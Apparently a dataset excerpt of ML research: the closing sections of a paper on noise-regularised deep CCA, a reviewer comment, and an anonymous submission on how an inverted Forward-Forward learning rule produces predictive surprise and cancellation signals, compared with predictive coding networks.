Figure 6, and the performance of the final epoch in the figure is presented in Table 2 in the Appendix A.11. Generally, the proposed NR-DCCA demonstrates a competitive and stable performance. Different from the synthetic data, the performance of CCA-based methods under-perform the DCCA-based methods, which might be due to the complex nature of the real-world views. However, the DCCA-based methods still exhibit varying degrees of collapse as the number of epochs increases. It is noteworthy that on the PolyMnist dataset, as the number of views increases, model collapses become more severe for DCCA-based methods, while our NR-DCCA can further improve the performance. ![Figure 6: Performance of different methods in real-world datasets. Each column represents the performance on a specific dataset. The number of views in the dataset is denoted in the parentheses next to the dataset name.](image) 6 Conclusions We propose a novel noise regularization approach for DCCA in the context of MVRL, and it can prevent model collapse during the training, which is an issue observed and analyzed in this paper for the first time. Specifically, we theoretically analyze the full-rank property in CCA and demonstrate that it is the key to preventing model collapse. To this end, an analogy of the “full-rank” property is defined for DCCA, and the noise regularization can be considered as an implicit constraint to make the neural networks “full-rank”. Additionally, synthetic datasets with different common rates are generated and tested on, which provide a benchmark for fair and comprehensive comparisons of different MVRL methods. The NR-DCCA developed in the paper inherits the merits of both CCA and DCCA to achieve stable and consistent outperformance in both synthetic and real-world datasets. More importantly, the proposed noise regularization approach can also be generalized to other DCCA-based methods (e.g., DGCCA). In future studies, we wish to explore the potential of noise regularization in other representation learning tasks, such as contrastive learning and generative models. It is also interesting to further investigate the “full-rank” definition of neural networks, and how it is different from other neural network regularization approaches, such as orthogonalization (Bansal et al., 2018; Huang et al., 2020) and weight decay (Loshchilov & Hutter, 2017; Zhang et al., 2018; Krogh & Hertz, 1991). Additionally, it is also interesting but challenging to investigate what (e.g., parameters, gradients, features) and how the neural network has been regularized through the noise. Our ultimate goal is to make the developed noise regularization a pluggable and useful module for neural network regularization. REPRODUCIBILITY STATEMENT All of our experiments are conducted with fixed random seeds and all the performance of downstream tasks is the average value of a 5-fold cross-validation. The CCA-zoo package is adopted as the implementation of various CCA/GCCA-based methods, and the original implementation of MVTCAE is employed. Both baselines and our developed NR-DCCA/NR-DGCCA are implemented in the same PyTorch environment (see requirements.txt in the source codes). All the datasets used in the paper are either provided or open datasets. Detailed proofs of all the propositions in the main paper can be found in the Appendix. Both source codes and appendix can be downloaded from the supplementary material. REFERENCES Shotaro Akaho. A kernel method for canonical correlation analysis. arXiv preprint cs/0609071, 2006. Guozhong An. The effects of adding noise during backpropagation training on a generalization performance. Neural computation, 8(3):643–674, 1996. Theodore Wilbur Anderson, Theodore Wilbur Anderson, Theodore Wilbur Anderson, and Theodore Wilbur Anderson. An introduction to multivariate statistical analysis, volume 2. Wiley New York, 1958. Galen Andrew, Raman Arora, Jeff Bilmes, and Karen Livescu. Deep canonical correlation analysis. In International conference on machine learning, pp. 1247–1255. PMLR, 2013. Haim Avron, Christos Boutsidis, Sivan Toledo, and Anastasios Zouzias. Efficient dimensionality reduction for canonical correlation analysis. In International conference on machine learning, pp. 347–355. PMLR, 2013. Nitin Bansal, Xiaohan Chen, and Zhangyang Wang. Can we gain more from orthogonality regularizations in training deep networks? Advances in Neural Information Processing Systems, 31, 2018. Adrian Benton, Huda Khayrallah, Biman Gujral, Dee Ann Reisinger, Sheng Zhang, and Raman Arora. Deep generalized canonical correlation analysis. arXiv preprint arXiv:1702.02519, 2017. Christopher M Bishop. Training with noise is equivalent to tikhonov regularization. Neural Computation, 7(1):108–116, 1995. Chih-Chung Chang and Chih-Jen Lin. Libsvm: a library for support vector machines. ACM transactions on intelligent systems and technology (TIST), 2(3):1–27, 2011. Xiaobin Chang, Tao Xiang, and Timothy M Hospedales. Scalable and effective deep cca via soft decorrelation. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 1488–1497, 2018. James Chapman and Hao-Ting Wang. Cca-zoo: A collection of regularized, deep learning based, kernel, and probabilistic cca methods in a scikit-learn style framework. Journal of Open Source Software, 6(68):3823, 2021. James Chapman, Ana Lawry Aguila, and Lennie Wells. A generalized eigengame with extensions to multiview representation learning. arXiv preprint arXiv:2211.11323, 2022. Giulio D’Agostini. On the use of the covariance matrix to fit correlated data. Nuclear Instruments and Methods in Physics Research Section A: Accelerators, Spectrometers, Detectors and Associated Equipment, 346(1-2):306–311, 1994. Deepak, K., Srivathsan, G., Roshan, S., and Chandrakala, S. Deep multi-view representation learning for video anomaly detection using spatiotemporal autoencoders. Circuits Systems and Signal Processing, 40(2), 2021.
6bAfAcuuZD
Secondly, the loss function requires an explicit positive/negative cue (eta). Historically this sort of global signal has been contentious in computational models. It may be worth emphasizing that this error signal is singular, and how this may be much more easily achieved than a global vector valued error/target signal.
EMERGENCE OF SURPRISE AND PREDICTIVE SIGNALS FROM LOCAL CONTRASTIVE LEARNING Anonymous authors Paper under double-blind review ABSTRACT Hierarchical predictive models are a popular view of cortical representations, and may hold promise for enhancing the robustness and generalization of machine learning architectures. These models exploit the local computation of predictive signals to pass information, but their manifestation in neurobiology remains rightly debated. This paper contributes an emerging principled approach to this discussion by investigating the inverted Forward-Forward Algorithm, a biologically plausible approach to learning with only forward passes. We demonstrate that hierarchical predictive signatures can emerge from a parsimonious combination of contrastive learning and learned cancellation which shape the network’s representation across layers. We identify similarities between our model and hierarchical predictive coding, and characterize the emergent properties of the resulting representations. These properties of the inverted FF model present falsifiable predictions which may be accessible in emerging experiments. This work advances the hypothesis that the computational properties which emerge in neocortical circuits, widely acknowledged as the basis of human intelligence, may be attributed to parsimonious, local learning principles. 1 INTRODUCTION The neocortex contains hierarchically layered circuits with rich feedforward and feedback connections (Chaudhuri et al., 2015; Bassett & Sporns, 2017; Siegle et al., 2021). The feedforward (or bottom-up) pathway involves the transfer of information from lower-level sensory areas to higher-level association areas, leading to the extraction of input-specific features. In contrast, the feedback (or top-down) pathway aids in the integration of high-level information by relaying signals from higher-level areas to lower-level ones. Though often assumed to propagate learning-related errors (LeCun et al., 2015), the functional role of feedback connections has been implicated in many different perceptual and cognitive abilities such as attention, efference copies, memory retrieval, etc. (Mechelli et al., 2004; Gilbert & Li, 2013). In the Bayesian view of cortical feedback, the bidirectional flow of information enables integration of ongoing sensory inputs with existing cortical representation of prior contextual information (Badre & Nee, 2018; Khan & Hofer, 2018; Froudarakis et al., 2019). A specific way to convey such contextual information is through surprise- and familiarity-based signals. When incoming sensory input corresponds to expectations, the surprise signal is minimal. When the input deviates from expectations, the surprise signal rises, indicating novelty or unfamiliarity. It has been shown that novel stimuli elicit increased neural activities that decrease over repeated presentations (Garrett et al., 2023; Piet et al., 2023). Such surprise signals contain information for the brain to improve its internal model of the external world, which leads to more refined and accurate expectations that can direct behavior (Wolpert et al., 1998; Kawato, 1999; Schenck, 2008). However, the mechanisms through which feedforward and feedback connections interact and generate such surprise signals are not well understood. An influential theory in neuroscience, predictive coding (Rao & Ballard, 1999; Jiang & Rao, 2022), postulates that feedback circuits deliver top-down spatiotemporal predictions of lower-level neural activities, while feedforward circuits send bottom-up prediction errors (surprises) to higher levels. Despite its popularity, minimizing prediction error is an iterative process based on gradient descent, which requires physical time for convergence and implies the symmetry between the feedback and feedforward synaptic weights, limiting its biologi- Figure 1: Simple illustrations representing model architecture and learning scheme. (a) Model architecture is shown where data inputs are clamped to the bottom and label inputs are clamped to the top of the network. (b) Forward-Forward contrastive learning schematic with definition of positive and negative datasets, where the label mismatches or matches the sensory input. (c) Learning scheme of the model is shown where the training phase proceeds in two steps - the presentation and processing phase respectively. In the processing phase, positive data should have a low activity, whereas negative data should have a high activity. Additionally, computing the prediction error requires a one-to-one correspondence between the predictive neurons and error neurons, which have not been confirmed experimentally (Jordan & Keller, 2020). Here, we present a simple and biologically plausible mechanism that captures the spatiotemporal predictive nature of cortical processing without generating explicit predictions. Our model is based on the Forward-Forward model (Hinton, 2022), a recently introduced form of contrastive learning. We inverted the original Forward-Forward objective to minimize the activity of positive training data and maximize the activity of negative training data, where we now refer to the level of activity as surprise. Such an objective promotes activity cancellation when top-down labels match bottom-up sensory input. As a consequence, different layers across the hierarchy learn to predict each other’s activity to enable such minimization (or cancellation) of activities. Our most significant contributions are: • we demonstrate that our model reproduces both hierarchical and temporal properties of predictive computations by means of generating information flows that lead to surprise and cancellation signals (Secs. 3.1 to 3.2); • we illustrate a mechanistic understanding of the emergence of such information fluxes by tracing their origin to the circuit’s ability to implement spatiotemporal cancellation across layers of activity (Secs. 3.2 to 3.3) • we establish an equivalence between our contrastive learning rule and a distinctive three-factor Hebbian plasticity, showcasing strong connections (and differences) to predictive coding. This finding emphasizing the biological plausibility of our model, characterized by online capability, no-weight transport, and the integration of local signals with a global signal. (Sec. 3.5). These results demonstrate that the application of a fundamental contrastive learning technique that integrates surprise and cancellation dynamics generates predictive spatiotemporal properties. This suggests that these properties, which are generally regarded to be distinctive characteristics of neo-cortical computations, can be generated by simple, locally-defined learning principles. 2 MODEL ARCHITECTURE AND LEARNING SCHEME We extend the Forward-Forward model (Hinton, 2022; Ororbia & Mali, 2023; Ororbia, 2023), a back-propagation-free learning paradigm regarded as a form of contrastive learning. Our model consists of a hierarchical network with multiple layers, with label information clamped at the top and input at the bottom (Fig. 1a). The label in this architecture is thought of as a second input, where the output of this network is its magnitude of activity. The activity magnitude serves as an indication of how well the label input (clamped top) matches the supplied data input (clamped bottom). Additionally, the network operates in the time domain, where activities of each layer are updated based on activities of adjacent layers at the previous timestep. The information flow of the input is considered to be bottom-up, whereas the information flow of the label is considered to be top-down. Neurons in each layer receive presynaptic input from a lower layer, a higher layer, and itself at the previous timestep. For layers at the bottom and top of the network, where there is no layer below or above, the presynaptic input is taken from the data input or label input respectively. The training process involves defining positive and negative datasets. Positive (negative) data is one in which the label and input do (not) match. For the negative dataset, the activity of each layer is increased, which can be thought of as indication of surprise (Fig. (1b)). For the positive dataset, the activity is diminished resulting in decreased surprise. In this network, each layer acts as its own learning agent based on its 3 inputs (top-down, bottom-up, lateral), to produce a level of activity representative of whether the data input matches the label input, even if the data and label inputs are not directly adjacent to the layer itself. The learning objective is defined in terms of the individual layer activations at each time \( x_{\text{layer}}(t') \): \[ L_{\text{layer}} = (-1)^{\eta} \sigma(x_{\text{layer}}^T(t')x_{\text{layer}}(t') - \theta) \] where the parameter \( \theta \in \mathbb{R} \) is the threshold set for the surprise calculation, while \( \eta \) equals zero or one (\( \eta = 0, 1 \)) for negative and positive data samples respectively. The final ingredient is the non-linearity \( \sigma \) which is taken to be a soft-plus function. It is worth noting that, while global supervisory terms are often dismissed as biologically implausible, \( \eta \) here acts as a simple, singular global signal, rather than something more complicated. Neurotransmitters in biological networks can act over a wide area (via volume transmission) to modulate the activity of many neurons, rather than just those directly connected by synapses. As such, a type of non-local signal might occur in response to learning or other processes, and remain biologically plausible. (We expand on bio-plausibility in section 4.3.) Training involves conducting forward passes for positive and negative data simultaneously. The most essential aspect of training is that only forward passes are made at all times. This makes the Forward-Forward algorithm biologically plausible, as it avoids the non-locality of weight information inherent to backpropagation. Only layer-local weights (top-down, bottom-up, lateral) are modified during training. In addition, we demonstrate that this algorithm is theoretically equivalent to particular types of Hebbian learning (see Supplementary Material). The network learns to process input and label by combining bottom-up and top-down information flows to generate activations that reflect positive and negative data points, respectively, upon training. We revise the training procedure to increase similarity to signal processing in biological networks (Fig. (1c)). First, the input is presented to the network (presentation phase), followed by the generation and introduction of the label (processing phase). Each phase is comprised of a number of timesteps (10 and 15, respectively). Training does not occur during the presentation phase; rather, training occurs only when label information is received during the processing phase. Each layer’s surprise decreases (increases) based on whether the associated label matches (mismatches) the presented input. This resembles cortical processing where surprise signals, often resulting in increased activity, are thought to arise from a mismatch between our sensory inputs and top-down signals reflecting our internal beliefs or world model – here, the label information. In other words, when the input and label match each other, the activity is lower than when a mismatch, or surprise, occurs. Inference involves running both the presentation phase and the processing phase, but keeping all parameters fixed. The class is then able to be decoded off of the latents of the processing phase. ### 3 RESULTS We train the model on the MNIST dataset following the scheme highlighted in Fig. (1). For every iteration, a single MNIST image is selected and presented as an input to the network (presentation phase of 10 timesteps). Following this presentation phase the label is introduced, while still presenting the image, and the network processes both input and label information (processing phase of 15 timesteps). We first focus on the spatial integration of bottom-up and top-down information flows. Learning follows as per Eq. (1) and accuracy is computed as outlined in Hinton (2022): for each input image $x$ all possible labels (classes 0 to 9) are introduced to the network, we deem the input image to be accurately processed if the surprise for the correct label is lower than for any other label. We train a 5 layer network with 700 neurons per layer minimizing Eq. (1). We used RMSProp as the optimizer with learning rate $5 \cdot 10^{-5}$, batch size 500, and Leaky ReLU as the transfer function for all units. We use no momentum and applied a stopgrad operation to all adjacent layer activations to prevent the parameter gradients from growing beyond one-step. Weight initializations and further details can be found in the available repository.\footnote{github [REDACTED FOR REVIEW]} The 5-layer, 25 timestep model accuracy achieved 95% test accuracy upon training (Fig. (2a)). Different activation functions were attempted, and sigmoid consistently showed to perform worse than ReLU derivatives, Fig. (2a). ### 3.1 Hierarchical emergence of surprise and cancellation signal By analyzing layer activity via L2 norm over time, we were able to confirm that the model learned to dynamically suppress neural activity across both layers and time whenever the input image matched the respective label (Fig. (2b)). The difference between negative and positive activations showed a clear divergence upon label presentation, Fig. (2b). This trend was the result of the contribution of multiple input components to the layers, Fig. (2c). Notably, the forward component representing the input from lower layers was the only significantly stronger component for negative versus positive data, suggesting a leading role of this component in driving the increased activity for surprise signals. This was true across all layers (Fig.S2). In order to understand how these input components were driving the increase in activity for negative data (surprise signal) – and decrease in activity for positive data (the cancellation upon label presentation), we focused on the late timesteps (10-25) where such phenomena appeared. We verified whether different input components were aligned or misaligned with each other, therefore issuing a cancellation in the overall activities. To this end we computed the cosine similarity (scalar product) between all pairs of the three input components before and after label presentation (presentation vs processing phase Fig. (2d)). For positive data the forward component was largely anti-aligned to both the backward and lateral components, suggest- Figure 3: Activations surprise and cancellation order. (a) The negative minus positive activations (differences) over time (x-axis) are shown as a measure of the negative activation surprise signal, offset from the baseline of our positive actions. (b) The L2 norm of negative activations (y-axis) is shown across time (x-axis), visualizing the cancellation cascade during the processing phase. (c) Same as panel b for the cancellation of positive activations. ing that the decrease in activity was due to the bottom-up (forward) information flow canceling the top-down (backward) and recurrent (lateral) information flows (Fig. 2(d)). Conversely, for negative data, the top-down and bottom-up information flows showed a higher degree of alignment, resulting in increased activations (surprise signal) (Fig. 2(d)). This analysis shows that our model reproduces hierarchical properties of predictive computations by generating information flows that result in surprise and cancellation signals. These signals are associated with the processing of negative and positive data, respectively, and involve distinct network information flows based on the dynamic cancellation of multiple input components. Although the degree of alignment across components could vary from instantiation to instantiation these cancellation phenomena were highly robust. 3.2 Dynamical emergence of surprise and cancellation signals We next interrogated the temporal characteristics of the cancellation and surprise information flows. We began by plotting activation differences across all layers (as performed in Fig. 2(c)) in Fig. 3(a). This demonstrated that the encoding of positive versus negative data diverged more rapidly between early layers compared to later layers. To confirm this, we analyzed activations for negative and positive data during the processing phase, after introducing the label. For negative data activity grew faster for earlier layers despite label information being fed from the top of the hierarchy Fig. 3(b). In the case of positive data early layer activations led the cancellation cascade by returning to a lower activation state, prior to late layers establishing a bottom-up cancellation ordering. We also analyzed the cosine similarity between activations of consecutive layers for both positive and negative data (Fig.S3) confirming these cascade ordering respectively for surprise and cancellation signals. Together, these findings shown in Figs. 3(a) to 3(c) indicate that alignment and anti-alignment dynamics across layer activations, leading to surprise and cancellation signals, originate in early layers despite the introduction of the label at the top of the hierarchy. 3.3 Interpreting latent representations which drive cancellations In order to understand the latent space mechanics driving cancellations on positive data, we sought to understand the intricate mechanics governing the latent space dynamics. We first plotted the average class-wise activations for various PCs in lower dimensions (Fig. 4(a)). We observe that the lower-order PCs do not offer a strong representation of the class, but they do offer a consistent path through the space that starts and ends at the same point. This is in line with the mechanics of the network under positive data, which starts from an initially low activity and recovers to a similarly low activity following all the timesteps where the label is presented. In the higher-order PCs (4-6), chosen for their stronger representations, the same looping mechanics are shown. However now the classes are represented in a separable manner. To further quantify this qualitative analysis we performed a careful decoding analysis highlighting the presence of label information across multiple PCs (Fig.S4c). For negative data, the looping behavior in the latent space does not occur, and the latent states drive away from the origin erratically in a class and label dependent manner. To measure the directionality of information flow throughout, 5 MLPs were trained on the latents of each of the 5 layer-wise activations for positive data (Fig. 4(b)). High decodability indicates Figure 4: Latent representations and label decodability over both principal components and layer. (a) Representation of the layer-wise latent spaces on three dimensions via PCA where classes are represented by color. The first three PCs are shown to indicate a lack of class separability. Higher-order PCs are shown to indicate stronger class separability. (b) Decodability (y-axis) over time (x-axis) for different layers, indicating that the pre-label timesteps are driven by a distinct bottom-up temporal driving, and by contrast late processing time displays cancellation (and the associated drop in decodability) cascading from the bottom-up. Label specific information. Two distinct cascades of decodability increase were observed: one for the presentation phase (timesteps 0-9, upon image presentation), and another for processing phase (timesteps 10-24, upon label introduction). These decodability increases revealed a layer-wise temporal ordering in opposite directions, consistent with the introduction of the image and label respectively at the top and bottom of the layer hierarchy. In the presentation phase, the decodability increases first for lower layers, indicating a bottom-up temporal ordering. By contrast, in the processing phase, the decodability increases first for upper layers. This analysis examines population-level coding and demonstrates the encoding properties of the network throughout its hierarchy tracking label specific information. 3.4 Comparison of the Forward-Forward Architecture with Predictive Coding Networks The hierarchical predictive dynamics analyzed this far, giving rise to surprise and cancellation signals, are specific of our model. We compare our model with established predictive coding networks (PCNs), first introduced by Rao & Ballard [Rao & Ballard, 1999], to further characterize these dynamics in contrast to those of PCNs. Predictive coding networks are characterized by a hierarchical structure wherein each layer predicts the subsequent layer’s activity, informed by the product of its activity and a weight matrix, processed through a nonlinear function. The objective function of this predictive coding network is to minimize the loss: $$L_{\text{layer}}(t) = |\phi(B\vec{x}_{t+1}) - \vec{x}_t|^2,$$ which is often referred to as prediction error. Here, $x_t$ denotes the activity of layer $l$, $B$ represents the weight matrix, and $\phi$ is a nonlinear activation function. The training process involves an alternating optimization strategy where the network first adjusts its weights to minimize the prediction error and subsequently refines the layer activations to further reduce the discrepancy between prediction and actual sensory input. This iterative process aims to model the brain’s learning mechanism, which continually adapts to new information. The Forward-Forward architecture differs from this framework in its intrinsic generation of predictions. Rather than relying on a hand-coded error computation between layers with dedicated error neurons and prediction errors, the Forward-Forward network learns predictions through a local learning rule intrinsic to each layer. This critical difference generates a dynamic which is qualitatively different. Figs. (5a) to (5c) show respectively the activations of error neurons, non-error neurons, and the compound activity. None of the highlighted phenomena in the Forward-Forward dynamics is present in such a predictive coding model. Critically, in a PCN, there is no distinction between positive or negative data, no surprise or cancellation signals generated by the network, and there is no bottom-up (or top-down) cascade in the way information propagates through the networks. On the other hand, these elements are observed in cortical networks, and are naturally generated by the Forward-Forward model. Figure 5: Analysis of Predictive Coding Network. The norm of activation of error neurons decreases with time for all layers. Norm of activation of non-error neurons increases across timesteps with no relationship between layer amplitude layer position. Norm of compound activations of error and non-error neurons. The Forward-Forward’s approach of eschewing hand-coded prediction errors leads to more biologically aligned phenomena, as it appears to reproduce the spatio-temporal bottom-up activity cascade observed in mice full field flash experiments, as highlighted by Siegle et al. (2021). This cascade did not appear in our implementation of a PCN, which instead demonstrated a rise in prediction errors across all layers simultaneously. Further research is needed towards understanding the conditions under which predictive coding networks (PCNs) might align with the Forward-Forward architecture’s distinctive dynamics, challenging the boundaries of these computational models in cortical computation emulation. 3.5 THE INVERTED FORWARD-FORWARD IS A CONTRASTIVE THREE-FACTOR-LEARNING RULE WHICH CONVERGES TO SYNAPTIC DRIVE CANCELLATION In this section, we demonstrate an online learning variant, showing learned cancellation arising from minimizing/maximization cumulative surprise. For a $N > 3$ Forward-Forward architecture where $N$ is the total number of layers, $I$ is the data input, and $\ell$ is the label input, the dynamics of each layer are governed by $$\dot{x}_i = \phi(W_i x_i + F_i I(t') + B_i x_{i+1})$$ The locally defined loss for a one-step update takes the form of $$L_{layer}(t') = (-1)^{\eta} \sigma(x_i^T x_i - \theta)$$ where $\sigma(x)$ represents the softplus as $\sigma(x) = \log(1 + e^x)$ and is a smooth version of the ReLU nonlinearity. Importantly, the dynamics of the $\eta(t')$ are governed by a bistable dynamics: $$\eta(t') = \delta_{L(t'),I(t')}$$ which occurs with long timescales between switches. Here $\delta_{ij}$ is the Kronecker delta notation, and $L(t')$ a signal that defines positive and negative data. This phenomenon could align with neuromodulator-induced shifts in underlying dynamics. It also suggests a criterion for selecting $\eta(t')$ based on the instantaneous surprise of the stimulus against the speculative label. Although beyond the scope of this work, the closure of this loop between activations and cost function may generate valuable insights into unsupervised variants of these learning rules (Ororbia & Mali, 2023). We then execute a single step-gradient update in each parameter: $$\partial_t W_i = -\alpha \nabla_{W_i} L(t')$$ $$\partial_t B_i = -\alpha \nabla_{B_i} L(t')$$ $$\partial_t F_i = -\alpha \nabla_{F_i} L(t').$$ By iteratively minimizing this locally defined objective function, we seek a hierarchical structure that will work in concert with the other layers to minimize activations for positive data. However, when there is a data mismatch between label and image class, the representations will learn to avoid cancellation to increase their surprise. Indeed this single-step update for a given layer takes the form of a three-factor Hebbian learning, since $$\nabla_{W_i} \mathcal{L}_i(t') = (-1)^n \sigma'(\vec{x}_i^T(t') \vec{x}_i(t') - T)(\vec{x}_i(t')) \phi'(z(t' - 1)) \vec{x}_i(t' - 1),$$ where $\vec{z}(t' - 1) = W_i \vec{x}_i(t' - 1) + F_i \vec{x}_{i-1}(t' - 1) + B_i \vec{x}_{i+1}(t' - 1)$ is the input current into the nonlinearity. This form of learning is formally a gated Hebbian or three-factor rule (Bahroun et al., Kuśmierz et al., 2017; Bredenberg et al., 2021; Pogodin & Latham, 2020; Portes et al., 2022; Bellec et al., 2020; Murray, 2019) linking the locally defined objective function to the product of the pre-synaptic current and the post-synaptic activation. Crucially, this loss for a single trial is indeed the cumulative sum over the full sequence: $$\Delta x_i = \alpha \sum_{t'} \nabla_{x_i} \mathcal{L}_i(t').$$ These gradients have important implications on the shape of the learned solutions. These learned solutions (where the gradient goes toward zero can occur under a number of conditions). These conditions include the direct cancellation of the synaptic drive currents (input components) governing the time dynamics of the hidden layer: $W_i \vec{x}_i + F_i \vec{x}_{i-1} + B_i \vec{x}_{i+1} = 0$. In this section, we established an equivalence between the inverted Forward-Forward and a unique form of gated Hebbian plasticity (dominated by a slow timescale sign-flip, a threshold passing gate, and a self-gain) (see section 4.1). In addition, we have demonstrated that the cancellation mechanism of lateral, top-down, and bottom-up signals satisfies the stationary solution to this deduced three-factor learning rule. 4 DISCUSSION 4.1 Why is the PCN distinct from the inverted FF? On the surface, the PCN and inverted FF are motivated by the same ambitions. They both avoid back-propagation in favor of local cost functions that admit three-factor descriptions of their learning. By using this unifying approach to focus on the third factor alone, we can appreciate the differences more clearly. $$\text{Third Factor} = \begin{cases} (-1)^n \sigma'(\vec{x}_i^T(t') \vec{x}_i(t') - T)(\vec{x}_i(t')) & \text{for the inverted FF} \\ (\phi(B_i \vec{x}_{i+1}) - \vec{x}_i) & \text{for the PCN} \end{cases}$$ The inverted FF differs from the PCN in two key aspects: contrastive supervision and gating conditions. In the inverted FF, supervision involves clamping the label at the top and employing a contrastive signal. In contrast, even in the PCN with a clamped label, the contrastive signal is absent. The second distinction lies in the conditioning of weight updates—on layer activity in the inverted FF and prediction error in the PCN. These differences account for the variations in steady-state activity and ordering. 4.2 Mechanisms behind cancellation order As a result of our simulation, a compelling non-trivial logic has emerged from the model’s hierarchical predictive dynamics, which are often difficult to comprehend. Here, we seek to explain the fundamental mechanistic principles underlying the network’s information flow generation. We determined that despite the fact that such insights are difficult to isolate or prove, they may still be necessary to comprehend the model’s inner mechanisms. For the initial presentation phase of both positive and negative data, the image representation flows from the bottom-up. The differences are, however, quite different in the processing phases. For negative data, the processing phase induces a top down signal carrying label information downward through all layers. This top-down label signal causes relatively small increases in layer activation magnitude. It is only when the label information reaches the bottom, that the activation response grows dramatically, indicating a mismatch and evoking a large and sustained excitatory surprise. For positive data, the label representation traverses to the bottom layer without inducing cancellations, whereby the cancellations then start in a bottom-up manner, despite the top-down label representation. As the presentation phase blends with the processing phase, it is insightful to note that, neither for the positive nor negative case is some predisposed behavior taking place. The layers in the network do not amplify or reduce their activations until the label representation reaches at least one layer below them and sends a label-infused representation back upwards. This suggests the bottom-up cancellation could be a result of the network’s optimizing drive to alter activities when in a familiar state relative to training. During training, there is a continuous and consistent exposure to label-augmented activations, particularly past the early stages, which ingrains a behavior within the network. The network recognizes label saturated activations as the dominant trend it should ideally be prepared for. Given this recognition, the network is best equipped for cancellation when it encounters activation components (forward, backward, recurrent) with label information coming from all components, not just from the top. Under this concept, a layer lower in the hierarchy would be predisposed to cancel first, due to the lower number of potential layers below lacking label-infused information which would thereby block cancellation. Thus, cancellation in lower layers would be followed by a transmission of label-infused activities upwards to the next layer to induce subsequent phases of bottom-up cancellation. 4.3 Bio-plausibility of the Inverted Forward-Forward The inverted Forward-Forward model uses activation contrast to navigate credit assignment in hierarchical architectures in a bio-plausible fashion by incorporating: the absence of weight transport (Lillicrap et al., 2016; Portes et al., 2022), online compatible learning rules consistent with three-factor Hebbian plasticity, a biologically analogous separation of timescales, and the incorporation of structural hierarchy. First, feedback is separated from backpropagation and instead incorporated as a top-down signal avoiding weight transport. By disconnecting the $F$ and $B$ matrices, the flexible learning rule finds aligned but non-weight transported solutions. Although global supervisory terms are sometimes downplayed as biologically implausible, it is worth comment that $\eta$ functions as a simple, singular global signal. In biological networks, neurotransmitters can exert influence over a broad area via volume transmission, modulating the activity of many neurons beyond those directly connected by synapses. This non-local signaling introduces biological plausibility, especially in the context of the local update rules of the inverted Forward-Forward model, which involve local Hebbian plasticity gated by thresholded activation and signed by data type. The associated third factor ties an external signal, suggestive of the aforementioned neuromodulatory input, to the minimization (maximization) of layer activity for positive (negative) labels. The slow timescales of this switching, relative to both dynamics and plasticity, suggest a normative hypothesis for the role of perhaps overlooked small molecules (Kuśmierz et al., 2017). Thus, the inverted Forward-Forward model introduces biological plausibility to the direct competition of top-down and bottom-up signal processing, with intriguing implications for interpreting the hierarchy of biological systems (Siegle et al., 2021; Garrett et al., 2023). 5 Conclusion In this work, we have presented a biologically plausible mechanism that sheds light on the spatiotemporal and predictive nature of cortical processing without necessitating explicit predictions. Drawing inspiration from the Forward-Forward model, an emerging form of local, contrastive learning, we inverted its original objective function to reduce surprise activations for positive data. This inversion incentivizes activity cancellation between information flows when top-down labels align with bottom-up sensory input. As a consequence, layers across the hierarchy develop the ability to predict and cancel each other’s activities, facilitating the minimization of layer surprise. In conclusion, our study demonstrates a local contrastive learning approach based upon surprise can recreate predictive spatiotemporal properties. The emergence of these neocortical-like processes advocates for understanding using simple learning principles. This discovery offers a ready avenue to improve the computational capacities of biologically plausible models. AUTHOR CONTRIBUTIONS If you’d like to, you may include a section for author contributions as is done in many journals. This is optional and at the discretion of the authors. ACKNOWLEDGMENTS Use unnumbered third level headings for the acknowledgments. All acknowledgments, including those to funding agencies, go at the end of the paper. REFERENCES David Badre and Derek Evan Nee. Frontal cortex and the hierarchical control of behavior. *Trends in cognitive sciences*, 22(2):170–188, 2018. URL https://www.cell.com/trends/cognitive-sciences/fulltext/S1364-6613%2817%2930245-0?elsca1=etoc&elsca2=email&elsca3=1364-6613_201802_22_2&elsca4=Cell+Press&code=cell-site Publisher: Elsevier. Yanis Bahroun, Dmitri B Chklovskii, and Anirvan M Sengupta. A Normative and Biologically Plausible Algorithm for Independent Component Analysis. Danielle S. Bassett and Olaf Sporns. Network neuroscience. *Nature neuroscience*, 20(3):353–364, 2017. URL https://www.nature.com/articles/nn.4502 Publisher: Nature Publishing Group US New York. Guillaume Bellec, Franz Scherr, Anand Subramoney, Elias Hajek, Darjan Salaj, Robert Legenstein, and Wolfgang Maass. A solution to the learning dilemma for recurrent networks of spiking neurons. *Nature Communications*, 11(1):3625, July 2020. ISSN 2041-1723. doi: 10.1038/s41467-020-17236-y. URL https://www.nature.com/articles/s41467-020-17236-y Number: 1 Publisher: Nature Publishing Group. Colin Bredenberg, Benjamin S. H. Lyo, Eero P. Simoncelli, and Cristina Savin. Impression learning: Online representation learning with synaptic plasticity. November 2021. URL https://openreview.net/forum?id=MAorPaLqam. Rishidev Chaudhuri, Kenneth Knoblauch, Marie-Alice Gariel, Henry Kennedy, and Xiao-Jing Wang. A large-scale circuit mechanism for hierarchical dynamical processing in the primate cortex. *Neuron*, 88(2):419–431, 2015. URL https://www.cell.com/neuron/pdf/S0896-6273(15)00765-5.pdf Publisher: Elsevier. Emmanouil Froudarakis, Paul G. Fahey, Jacob Reimer, Stelios M. Smirnakis, Edward J. Tehovnik, and Andreas S. Tolias. The Visual Cortex in Context. *Annual Review of Vision Science*, 5(1):317–339, September 2019. ISSN 2374-4642, 2374-4650. doi: 10.1146/annurev-vision-091517-034407. URL https://www.annualreviews.org/doi/10.1146/annurev-vision-091517-034407. Marina Garrett, Peter Groblewski, Alex Piet, Doug Ollershaw, Farzaneh Najafi, Iryna Yavorska, Adam Amster, Corbett Bennett, Michael Buice, Shiella Caldejon, Linzy Casal, Florence D’Orazi, Scott Daniel, Saskia EJ de Vries, Daniel Kapner, Justin Kiggins, Jerome Lecoq, Peter Ledochowitsch, Sahar Manavi, Nicholas Mei, Christopher B. Morrison, Sarah Naylor, Natalia Orlova, Jed Perkins, Nick Ponvert, Clark Roll, Sam Seid, Derrick Williams, Allison Williford, Ruweida Ahmed, Daniel Amine, Yazan Billeh, Chris Bowman, Nicholas Cain, Andrew Cho, Tim Dawe, Max Departee, Marie Desoto, David Feng, Sam Gale, Emily Gelfand, Nile Gradis, Conor Grasso, Nicole Hancock, Brian Hu, Ross Hytnen, Xiaoxuan Jia, Tye Johnson, India Kato, Sara Kivikas, Leonard Kuan, Quinn L’Heureux, Sophie Lambert, Arielle Leon, Elizabeth Liang, Fuhui Long, Kyla Mace, Ildefons Magrans de Abril, Chris Mochizuki, Chelsea Nayan, Katherine North, Lydia Ng, Gabriel Koch Ocker, Michael Oliver, Paul Rhoads, Kara Ronellenfitch, Kathryn Schelonka, Josh Sevigny, David 